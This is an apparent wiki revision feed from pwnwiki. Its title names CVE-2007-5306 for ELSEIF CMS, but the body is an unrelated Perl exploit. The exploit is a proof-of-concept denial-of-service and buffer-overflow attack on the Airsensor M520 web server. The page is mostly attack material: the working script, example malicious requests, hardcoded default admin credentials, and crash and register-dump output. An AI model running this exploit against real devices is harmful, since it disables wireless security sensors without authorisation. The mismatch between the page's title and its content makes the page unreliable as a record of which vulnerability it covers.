https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2007-5306_ELSEIF_CMS_Beta_0.6%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E 2026-04-16T09:44:48Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2007-5306_ELSEIF_CMS_Beta_0.6%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E&diff=847&oldid=prev 2021-04-01T03:31:44Z

<p>Created page with &quot;==EXP== &lt;pre&gt; #!/usr/bin/perl -w # # Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer Overflow PoC # # The vulnerability is caused due to a...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> #!/usr/bin/perl -w<br /> # <br /> # Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer Overflow PoC <br /> # <br /> # The vulnerability is caused due to an unspecified error in the cgis <br /> # files filter used for configure propierties. This can be exploited by <br /> # sending a specially crafted HTTPS request (necessary authentication), <br /> # which will cause the HTTPS service on the system to crash. <br /> # <br /> # Requisites: &quot;Use DHCP&quot; option interface mark &quot;No&quot; <br /> # <br /> # Examples: <br /> # <br /> # GET https://192.168.100.100/adLog.cgi?%41%41%41 HTTP/1.1 <br /> # GET https://192.168.100.100/post.cgi?%41%41%41 HTTP/1.1 <br /> # GET https://192.168.100.100/ad.cgi?%41%41%41 HTTP/1.1 <br /> # <br /> # Pinging: <br /> # <br /> # Before: <br /> # <br /> # Reply from 192.168.100.100: bytes=32 time&lt;1ms TTL=64 <br /> # Reply from 192.168.100.100: bytes=32 time&lt;1ms TTL=64 <br /> # Reply from 192.168.100.100: bytes=32 time&lt;1ms TTL=64 <br /> # <br /> # After: <br /> # <br /> # Hardware error. <br /> # Hardware error. <br /> # Hardware error. <br /> # Request timed out. <br /> # Request timed out. <br /> # Request timed out. <br /> # <br /> # C:\&gt;nc -vvn 192.168.100.100 443 <br /> # (UNKNOWN) [192.168.100.100] 443 (?): connection refused <br /> # sent 0, rcvd 0: NOTSOCK <br /> #<br /> # Buffer Overflow debug log:<br /> #<br /> # 1970-01-01 00:00:15 SYS-INFO:: AirDefense Firmware Version 4.4.1.4, Model = M520<br /> # 1970-01-01 00:00:15 SYS-CRIT:: SENSOR EXCEPTION ERROR<br /> # 1970-01-01 00:00:15 SYS-CRIT:: SENSOR VERSION NUMBER: 4.4.1.4<br /> # 1970-01-01 00:00:15 SYS-CRIT:: SENSOR Up Time: 00:08:51<br /> # 1970-01-01 00:00:15 SYS-CRIT:: Time of Exception: 1970-01-01 00:08:55<br /> # 1970-01-01 00:00:15 SYS-CRIT:: Exception ID = 10 ( Reserved Instruction)<br /> # 1970-01-01 00:00:15 SYS-CRIT:: Thread = HTTPD<br /> # 1970-01-01 00:00:15 SYS-CRIT:: MIPS Register Dump:<br /> # 1970-01-01 00:00:15 SYS-CRIT:: zero=0x00000000 at=0xfffffffe v0=0x00000000 v1=0x00000000<br /> # 1970-01-01 00:00:16 SYS-CRIT:: a0=0x00000000 a1=0x3d000000 a2=0x00000010 a3=0x00000041<br /> # 1970-01-01 00:00:16 SYS-CRIT:: t0=0x00000000 t1=0x0000003d t2=0x0000000b t3=0x00000000<br /> # 1970-01-01 00:00:16 SYS-CRIT:: t4=0x802f799c t5=0xf43dd40f t6=0x0066a1a4 t7=0x4df0e494<br /> # 1970-01-01 00:00:16 SYS-CRIT:: s0=0x802f7dbf s1=0x0000001f s2=0x802f7910 s3=0x80120000<br /> # 1970-01-01 00:00:16 SYS-CRIT:: s4=0x80120000 s5=0x80986c30 s6=0x80120000 s7=0x80128afc<br /> # 1970-01-01 00:00:16 SYS-CRIT:: t8=0x480ec8cd t9=0x742b7136 k0=0x802f78c8 k1=0x802f7910<br /> # 1970-01-01 00:00:16 SYS-CRIT:: gp=0x8015b070 sp=0x802f7910 fp=0x80128aec ra=0x800b2534<br /> # 1970-01-01 00:00:16 SYS-CRIT:: Address of instruction that caused exception = 0x800b2534<br /> # 1970-01-01 00:00:16 SYS-CRIT:: Memory address at which adress exception occured = 0x00000000<br /> # 1970-01-01 00:00:16 SYS-CRIT:: Return address = 0x800b2534<br /> # 1970-01-01 00:00:17 SYS-CRIT:: Status Reg = 0x1000af03<br /> # 1970-01-01 00:00:17 SYS-CRIT:: Cache Reg = 0x00000000<br /> # 1970-01-01 00:00:17 SYS-CRIT:: Cause Reg = 0x30000028<br /> # 1970-01-01 00:00:17 SYS-CRIT:: Config Reg = 0x03fffbfb<br /> # 1970-01-01 00:00:17 SYS-CRIT:: Vector = 40<br /> # 1970-01-01 00:00:17 SYS-CRIT:: Processor Version = 0x00018009<br /> # 1970-01-01 00:00:17 SYS-CRIT:: Stack Trace Begin: &quot;-&gt;&quot; = return address<br /> # 1970-01-01 00:00:17 SYS-CRIT:: [802f7910]=0x802f7dbf<br /> # 1970-01-01 00:00:17 SYS-CRIT:: [802f7914]=0x00000000<br /> # 1970-01-01 00:00:17 SYS-CRIT:: [802f7918]=0x00000000<br /> # 1970-01-01 00:00:19 SYS-CRIT:: [802f7990]=0x80130000<br /> # 1970-01-01 00:00:19 SYS-CRIT:: [802f7994]=0x802f7db4<br /> # 1970-01-01 00:00:19 SYS-CRIT:: [802f7998]=0x80152e18<br /> # 1970-01-01 00:00:19 SYS-CRIT:: [802f799c]=0x80152ed8<br /> # 1970-01-01 00:00:19 SYS-CRIT:: [802f79a0]=0x802f7dbf<br /> # 1970-01-01 00:00:19 SYS-CRIT:: [802f79a4]=0x80986c30<br /> # 1970-01-01 00:00:19 SYS-CRIT:: [802f79a8]=0x802f8200<br /> # 1970-01-01 00:00:19 SYS-CRIT:: -&gt;[802f79ac]=0x800f0450 &lt;- return address<br /> # 1970-01-01 00:00:19 SYS-CRIT:: [802f79b0]=0x0d0a0074<br /> # 1970-01-01 00:00:21 SYS-CRIT:: Stack Trace End:<br /> # <br /> # The vulnerability has been reported in versions Airdefense <br /> #<br /> # Firmware Version 4.3.1.1, Model = M520<br /> # Firmware version 4.4.1.4, Model = M520 <br /> # <br /> # More information: http://www.airdefense.net<br /> # http://support.airdefense.net<br /> #<br /> # Very special credits: str0ke, Kf, rathaous, !dsr, 0dd.<br /> # <br /> # and friends: nitr0us, crypkey, dex, xdawn, sirdarckcat, kuza55, <br /> # pikah, codebreak, h3llfyr3<br /> # <br /> # Alex Hernandez ahernandez [at] sybsecurity dot com<br /> #<br /> <br /> use strict;<br /> use LWP;<br /> use Data::Dumper;<br /> require HTTP::Request;<br /> require HTTP::Headers;<br /> <br /> my $string = &quot;%41%41%41&quot;; # Strings to send<br /> my $method = 'GET'; # Method &quot;GET&quot; or &quot;POST&quot;<br /> my $uri = 'https://192.168.100.100'; # Factory default IP address <br /> my $content = &quot;/adLog.cgi?&quot;; # Cgi's file to crash<br /> <br /> #my $content = &quot;/ad.cgi?&quot;;<br /> #my $content = &quot;/post.cgi?&quot;;<br /> #my $content = &quot;/logout.cgi?&quot;;<br /> <br /> my $headers = HTTP::Headers-&gt;new(<br /> <br /> 'Host:' =&gt; '192.168.100.100',<br /> 'User-Agent:' =&gt; 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6',<br /> 'Accept:' =&gt; 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',<br /> 'Accept-Language:' =&gt; 'en-us,en;q=0.5',<br /> 'Accept-Charset:' =&gt; 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', <br /> 'Keep-Alive:' =&gt; '300',<br /> 'Connection:' =&gt; 'keep-alive',<br /> 'Referer:' =&gt; 'https://192.168.100.100/adLog.cgi?submitButton=refresh&amp;refresh=Refresh',<br /> 'Authorization:' =&gt; 'Basic YWRtaW46YWlyc2Vuc29y', # base64 encode admin:airsensor<br /> <br /> );<br /> <br /> my $request = HTTP::Request-&gt;new($method, $uri, $headers, $content, $string);<br /> <br /> my $ua = LWP::UserAgent-&gt;new;<br /> my $response = $ua-&gt;request($request);<br /> <br /> print &quot;[+] Denial of Service exploit for Airsensor M520 Final\n&quot;;<br /> print &quot;[+] Coded by: Alex Hernandez [ahernandez\@sybsecurity.com]\n&quot;;<br /> print &quot;[+] We got this response from sensor: \n\n&quot; . $response-&gt;content . &quot;\n&quot;;<br /> <br /> my $data;<br /> foreach my $pair (split('&amp;', $response-&gt;content)) {<br /> my ($k, $v) = split('=', $pair);<br /> $data-&gt;{$k} = $v;<br /> }<br /> <br /> if ($data-&gt;{RESULT} != 0) {<br /> <br /> print &quot;[+] Denial of Service exploit for Airsensor M520 Final\n&quot;;<br /> print &quot;[+] Coded by: Alex Hernandez[ahernandez\@sybsecurity.com]\n&quot;;<br /> print &quot;[+] Use:\n&quot;;<br /> print &quot;\tperl -x dos_sensor.pl\n&quot;;<br /> print $data-&gt;{RESPMSG} . &quot;\n&quot;;<br /> exit(0);<br /> <br /> } else {<br /> <br /> print &quot;[+] Denial of service Exploit successed!!!\n&quot;;<br /> print &quot;[+] By Alex Hernandez[ahernandez\@sybsecurity.com]\n&quot;;<br /> }<br /> <br /> # milw0rm.com [2007-09-18]<br /> &lt;/pre&gt;</div>

Pwnwiki